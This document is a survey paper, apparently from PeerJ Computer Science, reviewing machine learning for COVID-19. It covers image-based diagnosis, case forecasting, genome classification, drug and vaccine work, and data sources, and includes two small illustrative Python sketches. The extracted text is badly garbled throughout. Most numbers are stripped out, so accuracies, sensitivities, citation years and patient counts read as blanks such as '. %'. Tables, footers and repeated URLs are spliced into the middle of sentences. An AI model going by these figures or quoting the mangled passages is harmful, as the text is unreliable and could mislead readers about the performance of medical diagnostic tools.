for example, apostolopoulos & mpesiana ( ) applied transfer learning with cnn to detect covid- from x-ray images containing common bacterial pneumonia and normal incidents and established covid- infection. transfer learning cnn was used to diagnose covid- cases from x-ray datasets. the results indicated that vgg diagnosed covid- confirmed cases with better accuracy on two- and three-classification problems compared with mobilenet v , inception, xception, and inception resnet v . the proposed approach can help develop a cost-effective, fast, and automatic covid- diagnostic tool, and reduce the exposure of medical workers to covid- . similarly, rahaman et al. ( ) developed an automated computer-aided diagnosis (cad) system for the detection of covid- samples from healthy cases and cases with pneumonia using chest x-ray (cxr) images. their study demonstrated the effectiveness of applying deep transfer learning techniques for the identification of covid- cases using cxr images. ardakani et al. ( ) were motivated by the time consumption and high cost of the traditional medical laboratory covid- test to investigate the performance of well-known cnns in diagnosing covid- . the variants of cnn included vgg- , alexnet, xception, vgg- , resnet- , squeezenet, resnet- , googlenet, mobilenet-v , and resnet- . all the cnn variants were applied on ct scan images because the ct slice is a fast method of diagnosing patients with covid- . the diagnostic results of the cnn variants indicated that resnet- and xception outperformed the other cnn variants in diagnosing covid- . they concluded that resnet- has a high sensitivity in characterizing and diagnosing covid- infections. therefore, it can be used as an alternative tool in the department of radiology for diagnosing covid- infection. it is cheaper and faster compared with traditional laboratory analysis. butt et al. ( ) applied cnn for the detection of covid- from the chest ct scan of patients. cnn was found very fast and reliable in the detection of covid- from a chest ct scan compared with the conventional rt–pcr testing. in summary, the cnn model is fast and reliable in detecting covid- infection. huang et al. ( b) applied a deep learning algorithm on a chest ct scan of a patient with covid- to quantify lung burden changes. the patients with covid- were grouped into mild, moderate, severe, and critical based on findings from the chest ct scan, clinical evaluation, and laboratory results. deep learning algorithm was applied to assess the lung burden changes. they found that the assessment of lung opacification measured on the chest ct scan substantially differed from that of the clinical groups. the approach can remove the subjectivity in the initial assessment of covid- findings. chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ mei et al. ( ) proposed a joint model comprising cnn, support vector machine (svm), random forest (rf), and multilayer perceptron integrated with chest ct scan result and non-image clinical information to predict covid- infection in a patient. cnn was run on the ct image, while the other algorithms classified covid- using the non-image clinical information. the output of the cnn and the different algorithms were combined to predict the patient’s covid- infection. the diagnostic tool can rapidly detect covid- infection in patients. liu et al. 
liu et al. ( a) used logistic regression to predict which covid-19 infections would progress to severe covid-19. the results of the study showed that ct quantification of the pneumonia lesions could predict the progression of a patient with covid-19 to a severe stage at an early, non-invasive level, which can provide a prognostic indicator for covid-19 clinical management. jiang et al. ( ) applied a machine learning algorithm to predict covid-19 clinical severity. they developed a predictive tool that identifies patients at risk of increased covid-19 severity at the first presentation. the study can help in the optimal utilization of scarce resources to cope with the covid-19 pandemic. hurt, kligerman & hsiao ( ) collected cxr images from patients with covid-19 in china and america and applied a deep learning algorithm for the early diagnosis of covid-19 from the cxr images. they found that deep learning predicted and consistently localized areas of pneumonia; the deep learning algorithm can therefore diagnose a patient's covid-19 infection early. loey, smarandache & khalifa ( ) were motivated by the insufficiency of covid-19 datasets to propose a generative adversarial network (gan) combined with cnn variants to detect covid-19 in patients. gan was used to generate additional x-ray images, and googlenet, alexnet, and resnet were applied as the deep transfer learning models. they reported the classification scores achieved by googlenet and alexnet on the four-, three-, and two-class classification problems. the study's method can facilitate the early detection of covid-19 and reduce the workload of radiologists. wu et al. ( ) proposed a multi-view resnet for the screening of covid-19 from chest ct scan images. resnet was trained with the multi-view chest ct scan images, and the results showed that the multi-view resnet fusion achieved higher performance compared with the single view. the diagnostic tool developed can reduce the workload of radiologists by offering fast, accurate covid-19 diagnosis. ucar & korkmaz ( ) developed a rapid covid-19 diagnosis tool for x-ray images based on squeezenet (a pre-defined cnn) and the bayesian optimization method. the squeezenet hyperparameters were optimized using bayesian optimization, and the bayesian optimization-based squeezenet was applied to detect covid-19 from x-ray images labeled normal, pneumonia, and covid-19. the bayesian-based squeezenet outperformed the baseline diagnostic tools. toğaçar, ergen & cömert ( ) applied cnn to diagnose covid-19, exploiting the social mimic optimization method and cxr images restructured with fuzzy color and the stacking method. the stacked data were trained using cnn, the obtained features were processed with social mimic optimization, and the compelling features were used for classification into covid-19, pneumonia, and normal x-ray imagery using svm. singh et al. ( ) used cnn and multi-objective differential evolution (mode) for the early detection of covid-19 from chest ct scan images. the initial parameters of the cnn were tuned using mode to create a mode-based cnn that classifies patients with covid-19 based on positive or negative chest ct scan images. the mode-based cnn outperformed the competitive models (ann, anfis, and traditional cnn), and the proposed method is beneficial for real-time covid-19 classification owing to its speed in diagnosing covid-19.
salman et al. ( ) constructed a cnn-based covid-19 diagnostic tool for the detection of covid-19 from cxr images. a cnn (inception) was applied to detect covid-19 from x-ray images of patients infected with covid-19 and normal x-ray images. the results indicated that the cnn–inception model could detect covid-19 from the x-ray images and reduce the testing time required by a radiologist. ozturk et al. ( ) used cnn to develop an automated tool for diagnosing covid-19 from raw cxr images. binary and multi-class classification were experimented on using a cnn with several convolution layers, applying a different filter on each convolution layer. the model can be used for the early screening of patients with covid-19 and can assist the radiologist in validating covid-19 screening. li et al. ( b) developed an automated framework based on cnn for the detection of covid-19 from chest ct scans and for differentiating it from community-acquired pneumonia. the study collected data from , patients comprising , chest ct scans, and cnn was applied to detect patients with covid-19 and typical community-acquired pneumonia. the experimental results showed that cnn can distinguish patients with covid-19 from those with community-acquired pneumonia and other similar lung diseases. the proposed framework automated the covid-19 testing process and reduced the testing time and fatigue. yang et al. ( a) applied densely connected convolutional networks optimized with the stochastic gradient descent algorithm for the detection of covid-19 from chest ct scan images. oh, park & ye ( ) applied a patch-based cnn–resnet (p-cnn) owing to the lack of sufficient training data for diagnosing covid-19 from cxr images. the study used imaging biomarkers of the cxr radiographs. the p-cnn produced clinically salient maps that are useful in diagnosing covid-19 and in patient triage, and it achieved the best result compared with the baseline algorithms; a limited amount of data can thus be used for covid-19 diagnosis, and the results are interpretable. table summarizes the diagnostic tools developed based on machine learning. refer to dong et al. ( ) for an engaging research review on the role of imaging in the detection and management of covid-19 disease spread.

covid-19 decision support system
decision support systems related to covid-19 can help decision makers and policymakers formulate policies to curtail covid-19, and many covid-19 decision support systems were developed based on machine learning approaches. for example, ayyoubzadeh et al. ( ) applied lstm and linear regression to predict the number of positive covid-19 cases in iran. lstm and linear regression were used on google search data to predict the covid-19 cases in iran, and the results indicated that linear regression outperforms lstm in predicting the positive cases of covid-19. the algorithm can predict the trend of the covid-19 pandemic in iran, which can help policymakers plan the allocation of medical resources. chimmula & zhang ( ) applied deep lstm for forecasting covid-19 transmission and the possible ending period of covid-19 in canada and other parts of the world. the transmission rate of canada was compared with that of italy and the usa, and the future outbreak of the covid-19 pandemic was predicted to help canadian decision makers monitor the covid-19 situation and prevent future transmission of the epidemic in canada.
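the forecasting studies above typically frame case prediction as a sequence-learning problem: a sliding window of past daily counts is fed to an lstm that predicts the next value. the sketch below shows one plausible minimal setup on a synthetic series; the window length, layer sizes, and data are assumptions for illustration and do not reproduce the configurations of ayyoubzadeh et al. or chimmula & zhang.

```python
# minimal lstm case-count forecaster on a synthetic series (illustrative only)
import numpy as np
import tensorflow as tf

series = np.cumsum(np.random.poisson(50, size=200)).astype("float32")  # toy cumulative cases
series = series / series.max()                                         # scale to [0, 1]
window = 7

# build (samples, timesteps, features) windows and next-day targets
X = np.stack([series[i:i + window] for i in range(len(series) - window)])[..., None]
y = series[window:]

model = tf.keras.Sequential([
    tf.keras.layers.LSTM(32, input_shape=(window, 1)),
    tf.keras.layers.Dense(1),
])
model.compile(optimizer="adam", loss="mse")   # rmse values reported in the literature are sqrt(mse)
model.fit(X, y, epochs=10, verbose=0)

next_day = model.predict(series[-window:].reshape(1, window, 1))
print(next_day[0, 0])                         # scaled forecast for the next day
```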
liu et al. ( b) proposed ann for modeling the trend of covid-19 and restoring the operational capability of medical services in china. ann was used for modeling the pattern of covid-19 in wuhan, beijing, shanghai, and guangzhou, and the autoregressive integrated moving average (arima) model was applied for the estimation of nonlocal hospital demands during the covid-19 pandemic in beijing, shanghai, and guangzhou. the results projected the percentage increases in the number of people infected with covid-19 and in deaths, and indicated that covid-19 would reach its peak by march and subside toward the end of april. this finding will assist policymakers and health officials in planning to deal with the challenge of the unmet medical requirements of other diseases during the covid-19 pandemic. pirouz et al. ( ) proposed a group method of data handling neural network to predict the number of covid-19 confirmed cases based on weather conditions. the dominant weather conditions used included temperature, city density, humidity, and wind speed. the results indicated that humidity and temperature have a substantial influence on covid-19 confirmed cases, with temperature and humidity influencing covid-19 negatively and positively, respectively. these results can be used by decision makers to manage the covid-19 pandemic. yang et al. ( b) applied lstm to predict the covid-19 trend in china. the prediction model indicated that the covid-19 pandemic should peak toward the end of february and start declining at the end of april, and it can be used by the authorities in china to make decisions on controlling the covid-19 pandemic. vaid, cakan & bhandari ( ) adopted a machine learning approach to predict potential covid-19 infections based on reported cases in north america. critical parameters were identified using dimension reduction, and past infections were inferred from recent fatalities using a hierarchical bayesian estimator. the model predicted potential covid-19 infections in north america, and policymakers in north america can use the projection to curtail the effect of the covid-19 pandemic. tuli et al. ( ) developed a machine learning covid-19 predictive model and deployed it in a cloud computing environment for real-time tracking of covid-19 and for predicting the growth and potential threat of covid-19 in different countries worldwide. governments and citizens can use the results to take proactive measures to fight covid-19. tiwari, kumar & guleria ( ) used a machine learning approach to predict the number of covid-19 cases, recoveries, and deaths in india based on data from china. the prediction results indicated that covid-19 would peak between the third and fourth weeks of april, and the indian government can use the study to formulate policies and decide on mitigating the spread of covid-19. ribeiro et al. ( ) evaluated six machine learning algorithms, namely, cubist regression (cubist), rf, ridge regression (ridge), support vector regression (svr), arima, and stacking-ensemble learning (sel), on covid-19 datasets collected in brazil to predict confirmed cases several days ahead.
they found that svr outperformed ridge, arima, rf, cubist, and sel. the study can help in monitoring covid-19 cases in brazil and facilitate critical decisions on covid-19. tummers et al. ( ) applied k-means to cluster documents related to covid-19 and people with intellectual disability. table summarizes the studies on covid-19 decision support systems.

table: summary of the covid-19 diagnostic tools based on machine learning algorithms.
reference | algorithm | performance | contribution | benefit
apostolopoulos & mpesiana ( ) | transfer learning with cnn | accuracy: . %; sensitivity: . %; specificity: . % | approach for automatic diagnosis of covid-19 based on x-ray | cost-effective, fast diagnosis; reduces exposure of medical workers to covid-19
ardakani et al. ( ) | variants of cnn (resnet) | accuracy: . %; sensitivity: %; specificity: . % | automated characterization and diagnosis of covid-19 infection | cheaper and faster compared with the traditional laboratory analysis of covid-19; reduces medical workers' workload
butt et al. ( ) | cnn | auc: . ; sensitivity: . %; specificity: . % | outperforms the traditional rt–pcr testing of covid-19 | fast and reliable in detecting covid-19
huang et al. ( b) | deep learning algorithm | not applicable (anova analysis) | the assessment of the lung opacification measured differed significantly among the clinical groups | has the potential to remove the subjectivity in the initial evaluation of covid-19 findings as well as in pulmonary follow-up
li et al. ( b) | cnn | sensitivity: %; specificity: %; auc: % | automated framework that differentiates covid-19 from pneumonia | automates the covid-19 testing process, reduces testing time and fatigue
liu et al. ( a) | p-cnn | sensitivity: %; precision: . % | diagnoses covid-19 with limited data and presents a new probabilistic grad-cam salient map | a limited amount of data can be used for covid-19 diagnosis, and the result is interpretable
ozturk et al. ( ) | cnn | sensitivity: . %; specificity: . %; accuracy: . % | improves efficiency and automates the covid-19 screening process | automates the process of covid-19 diagnosis to reduce fatigue
salman et al. ( ) | cnn | sensitivity: %; specificity: %; accuracy: % | automated covid-19 screening process | reduces diagnostic time
singh et al. ( ) | mode-based cnn | sensitivity: > %; specificity: > % | diagnoses covid-19 with better accuracy than the competitive models | beneficial for real-time covid-19 classification
toğaçar, ergen & cömert ( ) | cnn–svm | overall accuracy: . % | contributed to the efficient detection of covid-19 | automated detection of covid-19 patients
ucar & korkmaz ( ) | bayesian-based squeezenet | accuracy: %; specificity: . % | presents an alternative rapid covid-19 diagnostic tool based on deep bayes-squeezenet | benefits healthcare professionals in diagnosing covid-19 efficiently
wu et al. ( ) | resnet | accuracy: . ; sensitivity: . ; specificity: . | provides covid-19 diagnosis from multiple views | reduces the workload of a radiologist by offering fast and accurate covid-19 diagnosis
loey, smarandache & khalifa ( ) | googlenet, alexnet and resnet | googlenet and alexnet scored . %, . % and % in the four-, three- and two-class classification problems | generates sufficient covid-19 data to improve covid-19 diagnosis | early detection of covid-19 and reduced radiologist workload

covid-19 from genome sequences
the protein sequences of covid-19 can be collected to apply machine learning approaches for the prediction of covid-19 (qiang et al., ). for example, qiang et al. ( ) predicted the infection risk of non-human-origin covid-19 from spike proteins for prompt alarm using rf. the genome data comprised non-human covid-19 origin (positive) and human covid-19 origin (negative) samples. rf was applied during training to predict non-human covid-19 origin, and the results showed that the rf model achieved high accuracy in predicting non-human covid-19 origin. the study can be used in covid-19 genome mutation surveillance and for exploring evolutionary dynamics in a simple, fast, and large-scale manner.
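a common way to turn genome or protein sequences into fixed-length inputs for a classifier such as rf is k-mer counting. the sketch below is only loosely inspired by the screening idea above: the sequences, labels, and the choice of k = 3 are toy assumptions and do not reproduce qiang et al.'s actual features or data.

```python
# k-mer counts + random forest for sequence-origin classification (toy example)
from collections import Counter
from itertools import product
import numpy as np
from sklearn.ensemble import RandomForestClassifier

K = 3
VOCAB = ["".join(p) for p in product("ACGT", repeat=K)]   # all 64 possible 3-mers

def kmer_vector(seq):
    # count how often each k-mer occurs in the sequence
    counts = Counter(seq[i:i + K] for i in range(len(seq) - K + 1))
    return np.array([counts[k] for k in VOCAB], dtype=float)

# toy labelled sequences: 1 = non-human origin (positive), 0 = human origin (negative)
data = [("ATGCGTACGTTAGC", 1), ("ATGCCCGGGTTTAA", 1),
        ("ATGAAATTTCCCGG", 0), ("ATGTTTAAACCCGG", 0)]
X = np.stack([kmer_vector(seq) for seq, _ in data])
y = np.array([label for _, label in data])

clf = RandomForestClassifier(n_estimators=100, random_state=0).fit(X, y)
print(clf.predict([kmer_vector("ATGCGTACGTAAGC")]))       # predicted origin of a new sequence
```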
randhawa et al. ( ) combined decision tree and digital signal processing (dt–dsp) to detect the covid-19 virus genome and identified the signature of the intrinsic covid-19 virus genome. dt–dsp was applied to explore over , viral genome sequences along with the viral sequences of covid-19. the results supported the bat origin of covid-19 and successfully classified covid-19 with % accuracy as the sub-genus sarbecovirus within betacoronavirus. dt–dsp is a reliable real-time alternative for taxonomic classification. table summarizes the studies.

table (continued): summary of the covid-19 diagnostic tools based on machine learning algorithms.
reference | algorithm | performance | contribution | benefit
hurt, kligerman & hsiao ( ) | deep learning | not provided | improves the detection of covid-19 from x-ray | early detection of covid-19
jiang et al. ( ) | machine learning algorithm | accuracy: – % | detects covid-19 severity in a patient at the initial presentation | helps in the optimal utilization of scarce resources to cope with covid-19
liu et al. ( a) | logistic regression | roc: . ; confidence interval: % | applied ct quantification of pneumonia to predict progression to covid-19 severity | provides a prognostic indicator for covid-19 clinical management
mei et al. ( ) | deep ensemble algorithm | roc: . ; accuracy: %; sensitivity: . %; specificity: . % | predicts covid-19 with both image and non-image clinical information | the ensemble diagnostic tool can detect covid-19 patients rapidly
yang et al. ( a) | densely connected convolutional networks | accuracy: %; sensitivity: %; specificity: % | detects covid-19 from ct scans via densely connected convolutional networks | reduces radiologist workload

covid-19 drug discovery
machine learning and ai provide approaches for the speedy processing of the large amount of medical data generated daily, as well as for the extraction of new information from transversely different applications. in the prediction of disease, a viral mutation can be forecast before the emergence of new strains. they also allow the prediction of new structures and the availability of broader structural information, and efficient drug repurposing can be achieved by mining existing data. the stages for the development of covid-19 drugs are as follows (park et al., ):
disease prediction: the prediction of future-generation viral mutation can be accomplished by ai and machine learning approaches.
structural analysis: the covid-19 structure and primary functional sites are characterized.
drug repurposing: for insight into new disease treatment, existing drug data are mined.
new drug development: efficiencies across the entire pharmaceutical life cycle are achieved by rapid processing.
table: summary of detecting covid-19 from genome sequences via machine learning algorithms.
reference | algorithm | performance | contribution | benefit
qiang et al. ( ) | random forest | accuracy: . %; matthews correlation coefficient: . | able to detect non-human covid-19 origin from spike proteins | used in covid-19 genome mutation surveillance
randhawa et al. ( ) | decision tree | accuracy: % | successfully used intrinsic viral genomic signatures to classify covid-19 with % accuracy | dt–dsp is a reliable real-time alternative for taxonomic classification

table: summary of the adoption of machine learning approaches in building covid-19 decision support systems.
reference | algorithm | performance | contribution | benefit
ayyoubzadeh et al. ( ) | lstm & linear regression | lstm: rmse . ; linear regression: rmse . | predicts covid-19 positive cases in iran | the algorithm can predict the trend of the covid-19 pandemic in iran, which can help policymakers plan the allocation of medical resources
chimmula & zhang ( ) | lstm | rmse: . ; accuracy: . % | forecasts covid-19 transmission in canada | helps decision makers in monitoring and curtailing future transmission of covid-19 in canada
liu et al. ( b) | ann | not applicable | estimated the trend of covid-19 in china | helps policymakers and health officials attend to the needs of other diseases during the covid-19 pandemic
ribeiro et al. ( ) | support vector regression | mae: . | provides future covid-19 confirmed cases in brazil | monitoring covid-19 cases in brazil and helping decision makers take critical decisions about covid-19
tiwari, kumar & guleria ( ) | machine learning algorithm (not specified) | mae & rmse (graphical) | predicted the peak period of covid-19 in india | helps indian policymakers decide on covid-19 measures to mitigate its spread
tuli et al. ( ) | machine learning algorithm (not specified) | mse: . e+ | provides real-life covid-19 predictions | governments and citizens can use the results for proactive measures to fight covid-19
vaid, cakan & bhandari ( ) | machine learning algorithm (not specified) | not reported | predicts potential covid-19 infections | policymakers in north america can use the projection to curtail the effect of the covid-19 pandemic
yang et al. ( b) | lstm | confidence interval: % | predicts the covid-19 trend in china | authorities in china can use it to decide on controlling the covid-19 pandemic
pirouz et al. ( ) | group method of data handling neural network | accuracy: . % | predicts the covid-19 pandemic based on weather conditions | helps in managing the covid-19 pandemic

ke et al. ( ) applied machine learning to identify already-marketed drugs that can treat covid-19. they compiled two independent datasets to develop two machine learning models: the first model was built based on drugs known to have antiviral activities, and the second model was built based on 3c-like protease inhibitors. the database of market-approved drugs was screened by the machine learning models to predict drugs with potential antiviral activities. the drugs predicted to have antiviral activities were evaluated for antiviral activity with a cell-based feline infectious peritonitis virus duplication assay, and the assay results were fed back to the machine learning models for incremental learning. finally, marketed drugs were identified as having potential antiviral activities, and old drugs with antiviral activities against the feline infectious peritonitis coronavirus were found.

covid-19 vaccine development
typically, the immune system is prepared by a vaccine to elicit antibody- or cell-mediated responses against a pathogen, which protects the body from infectious diseases. immunogenicity is the ability of the vaccine to elicit such a response, and for long-lasting, effective immunity the vaccine has to properly activate innate and adaptive responses (klein, jedlicka & pekosz, ). the following phases should be adopted to develop a covid-19 vaccine (gonzalez-dias et al., ): dataset preparation: the quality of the data to be used influences the machine learning algorithm; thus, preparing quality data before feeding it into the algorithm is essential. data come in different sizes, ranging from small to medium and large.
data quality must be ensured because a quality immune response is needed. the reliability of the data needs to be guaranteed by ensuring that the serological assay is well qualified, in case it is not validated, based on known parameters (linearity, specificity, lloq, llod, uloq, ruggedness, and reproducibility). vaccines and relevant genes: in vaccinology, the machine learning algorithm is trained to discover the combination of genes and the best vaccine parameters. the data for the training are extracted from omics experiments and are used to obtain the required combination. feature selection is performed to find the best representatives of the discriminatory gene signatures, and then the new vaccines are predicted; the three main feature selection methods are filter, wrapper, and embedded. machine learning algorithm selection: this is not a straightforward task because many factors must be considered before selecting the appropriate algorithm for the modeling. the choice of the algorithm depends on the nature of the data, and the options include supervised, unsupervised, and semi-supervised learning. for instance, if the data have no output, then an unsupervised learning algorithm, for example, k-nearest neighbor, is a possible candidate for the modeling, but this is not guaranteed; many algorithms have to be tested on the same problem before the algorithm that produces the best output is selected. model testing: the performance of the model is tested. the data are partitioned into training and testing sets; the former is used for training the algorithm, and the latter is used for evaluating the performance of the model using several performance parameters, for example, mse, accuracy, and f-measure (gonzalez-dias et al., ). the application of a machine learning algorithm to sift through trillions of compounds for vaccine adjuvants can shorten the vaccine development time, and the machine learning algorithm can be used for screening compounds as potential adjuvant candidates for the sars-cov-2 vaccine (ahuja, reddy & marques, ).

covid-19 datasets
data sources
ahuja, reddy & marques ( ) reported that covid-19 data are now growing. in this section, we present the sources of covid-19 data to the machine learning community. given the novelty of the virus, centralizing the collection of data sources will help researchers access different types of covid-19-related data and provide them with opportunities to work on different aspects of covid-19 that may lead to novel discoveries. table has five columns, where the first, second, third, fourth, and fifth columns represent the reference, data, owners, source/accessibility, and remarks, respectively. we only present the projects that revealed and fully discussed their data sources.

covid-19 on cxr and ct scan images
in this section, we discuss the diagnosis of covid-19 based on x-ray and ct scan images because of their high value in covid-19 screening. table shows that researchers heavily utilize x-rays and ct scans in developing machine-learning-based covid-19 diagnosis tools. guan et al. ( ) and wong et al. ( ) found that portable chest radiography (cxr) has a sensitivity of % for the initial detection of covid-19-related abnormalities. radiographic abnormalities, when present, mirror those of ct, with a bilateral lower zone, peripherally predominant consolidation, and hazy opacities (world health organization, ).
the radiological findings of covid- on cxr are those of atypical pneumonia or organizing pneumonia (kooraki et al., ). although chest ct scans are reportedly less sensitive than cxrs, chest radiography remains the first-line imaging modality of choice used for patients with suspected covid- infection (hui et al., ) because it is cheap and readily available, and can easily be cleaned. for ease of decontamination, the use of portable radiography units is preferred. chest radiographs are often normal in early or mild disease. according to a recent study of patients with covid- requiring hospitalization, % had an abnormal chest radiograph at the initial time of admission, and % had radiographic abnormalities sometime during hospitalization. the findings are reported to be most extensive about – days after symptom onset. the most frequent radiographic findings are airspace opacities, whether described as consolidation or less commonly, ground-glass opacity (ggo) (wong et al., ). the distribution is most often bilateral, peripheral, and lower zone predominant chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (rodrigues et al., ). unlike parenchymal abnormalities, pleural effusion is rare ( %) (wong et al., ). according to the center for disease control (cdc), even if a chest ct or x-ray suggests covid- , viral testing is the only specific method for diagnosis. radiography’s sensitivity was reported at only % for detection of lung opacities related to covid- , among patients seen in south korea with a reported specificity of % (wen et al., ). the x-ray image should be considered a useful tool for detecting covid- which is challenging the healthcare system due to the overflow of patients. as the covid- pandemic grinds on, clinicians on the front lines may increasingly turn to radiography (casey, ). the most frequent findings are airspace opacities, whether described as consolidation or less commonly, ggo. the distribution is most often bilateral, peripheral, and lower zone predominant (wong et al., ). much of the imaging focus is on ct. in february , chinese studies revealed that chest ct achieved a higher sensitivity for the diagnosis of covid- compared with initial rt–pcr tests of pharyngeal swab samples (ai et al., ; fang et al., ). subsequently, the national health commission of china briefly accepted chest ct findings of viral pneumonia as a diagnostic tool for detecting covid- infection (yuen et al., ; zu et al., ). the typical appearance of covid- on chest ct consists of multi-lobar, bilateral, predominantly lower lung zone, rounded ggos, with or without consolidation, in a mostly peripheral distribution. however, such findings are nonspecific; the differential diagnosis includes organizing pneumonia and other infections, drug reactions, and other inflammatory processes. consequently, using ct to screen for covid- may result in false positives. moreover, the presence of abnormalities not typically associated with covid- infection, including pure consolidation, cavitation, thoracic lymphadenopathy, and nodules suggests a different etiology (bernheim et al., ). covid- -related chest ct abnormalities are more likely to appear after symptom onset, but they may also precede clinical symptoms. in a retrospective study by bernheim et al. ( ), % of patients presenting within days of symptom onset had an abnormal chest ct, while % presenting within – days and % presenting after days had abnormal chest cts. shi et al. 
( ) found ggos in of asymptomatic healthcare workers with confirmed covid- . similarly, % of asymptomatic passengers with covid- on the diamond princess cruise ship had findings of viral pneumonia on the ct (inui et al., ). in a prospective study by wang et al. ( b) pure ggos were the only abnormalities seen prior to symptom onset. subsequently, % of patients developed superimposed septal thickening – days after symptom onset. architectural distortion evolving from ggos appeared later in the disease course, likely reflecting organizing pneumonia and early fibrosis. long-term follow-up imaging is also needed to determine the sequelae of sars-cov- infection. in a retrospective study by das et al. ( ), % of patients who recovered from mers-cov developed pulmonary fibrosis; a similar outcome following covid- is likely. lung ultrasound offers a low-cost, point-of-care evaluation of the lung parenchyma without ionizing radiation. the modality is especially useful in resource-limited settings (stewart et al., ). peng, wang & zhang ( ) found that chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table summary of covid- data sources and accessibility. reference data owners source/accessibility remarks apostolopoulos & mpesiana ( ), ozturk et al. ( ), salman et al. ( ), toğaçar, ergen & cömert ( ), ucar & korkmaz ( ) and loey, smarandache & khalifa ( ) x-ray cohen https://github.com/ ieee /covid- chestxray-dataset a project with a collection of x-rays images apostolopoulos & mpesiana ( ) x-ray kaggle https://www.kaggle. com/andrewmvd/ convid -x-rays dataset_ : images with covid- , images with common bacterial pneumonia, and normal images condition dataset_ : cases of covid- , healthy instances, and has both bacterial and viral pneumonia ardakani et al. ( ) ct scan ardakani et al. ( ) -mdct scanner (alexion, toshiba medical system, japan) the data contained ct slices from patients confirmed covid- and patients without covid- ayyoubzadeh et al. ( ) and vaid, cakan & bhandari ( ) time series worldometer https://www. worldometers.info/ coronavirus/ the daily new covid- cases from / , , to / / in iran. dataset features: previous day’s search trends, previous day cases, and output: new cases of the current day barbosa & fernandes ( ) genome barbosa & fernandes ( ) https://data.mendeley. com/datasets/ nvk bf m f/ the data is chaos game representation of sars-cov- containing both the raw and processed data with instances of sars-cov- genome butt et al. ( ) ct scan butt et al. ( ) butt et al. ( ) the data comprised of ct scan samples including from covid- patients chimmula & zhang ( ) time series johns hopkins university and canadian health authority chimmula & zhang ( ) the data is available in time series: date, month and year up to / / huang et al. ( b) ct scan huang et al. ( b) huang et al. ( b) covid- patients that underwent a ct chest scan from / / to / / li et al. ( b) ct scan li et al. ( b) li et al. ( b) data from , patients comprising of chest ct scans. data collection period from / / to / / liu et al. ( a) time series . tencent news real covid- reporting: https:// news.qq.com/zt / page/feiyan.htm? adtag=area . covid- time-series data including locations confirmed cases, deaths, recovery cases, and new diagnosed cases . baidu baidu: http://qianxi. baidu.com . 
baidu is an open-source for big data project that provides visualization of population migration oh, park & ye ( ) x-ray society of radiological technology oh, park & ye ( ) segmentation network dataset with a total of posteroanterior chest radiographs chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/ieee /covid-chestxray-dataset https://github.com/ieee /covid-chestxray-dataset https://github.com/ieee /covid-chestxray-dataset https://www.kaggle.com/andrewmvd/convid -x-rays https://www.kaggle.com/andrewmvd/convid -x-rays https://www.kaggle.com/andrewmvd/convid -x-rays https://www.worldometers.info/coronavirus/ https://www.worldometers.info/coronavirus/ https://www.worldometers.info/coronavirus/ https://data.mendeley.com/datasets/nvk bf m f/ https://data.mendeley.com/datasets/nvk bf m f/ https://data.mendeley.com/datasets/nvk bf m f/ https://news.qq.com/zt /page/feiyan.htm?adtag=area https://news.qq.com/zt /page/feiyan.htm?adtag=area https://news.qq.com/zt /page/feiyan.htm?adtag=area https://news.qq.com/zt /page/feiyan.htm?adtag=area http://qianxi.baidu.com http://qianxi.baidu.com http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ sonographic findings in patients with covid- correlated with typical ct abnormalities. the predominantly peripheral distribution of lung involvement facilitated sonographic visibility. characteristic findings included thickened, irregular pleural lines, b lines table (continued) reference data owners source/accessibility remarks qiang et al. ( ) protein sequence china national genomic data center https://bigd.big.ac.cn/ ncov the database has an extensive protein sequence randhawa et al. ( ) genome national center for biotechnology information https://sourceforge.net/ projects/mldsp-gui/ files/ covid dataset the database has genome dataset with thousands of bp ribeiro et al. ( ) time series ribeiro et al. ( ) https://brasil.io/api/ dataset/covid /caso/ data/?place_ type=state daily covid- reports on confirmed cases from different states in brazil singh et al. ( ) ct scan singh et al. ( ) singh et al. ( ) chest ct scan images from icu tiwari, kumar & guleria ( ) time series center for systems science and engineering (csse) at johns hopkins university (jhu). https://www.kaggle. com/ sudalairajkumar/ novel-corona-virus- -dataset confirmed covid- cases, recovered cases, and death cases from china tuli et al. ( ) time series hannah ritchie https://ourworldindata. org/coronavirus- source-data the dataset is the our world in data provided by hannah ritchie wu et al. ( ) ct scan wu et al. ( ) wu et al. ( ) the ct scan images of patients were collected from three hospitals in china yang et al. ( b) time series . national health commission of china . http://www.nhc.gov. cn/xcs/yqtb/list_ gzbd.shtml sars and covid- datasets . https://qianxi.baidu. com/ . baidu . http://news.sohu. com/ / / subject . shtml . sohu hurt, kligerman & hsiao ( ) x-ray hurt, kligerman & hsiao ( ) hurt, kligerman & hsiao ( ) chest x-ray images from china and america jiang et al. ( ) ct scan & clinical characteristics jiang et al. ( ) jiang et al. ( ) ct scan images and clinical characteristics liu et al. ( a) ct scan liu et al. ( a) liu et al. ( a) chest ct scan that was performed using a -slice ct scanner without contrast agents. mei et al. ( ) ct scan and clinical information mei et al. ( ) mei et al. ( ) both clinical information and chest ct scan images were collected for the study pirouz et al. ( ) time series pirouz et al. ( ) pirouz et al. 
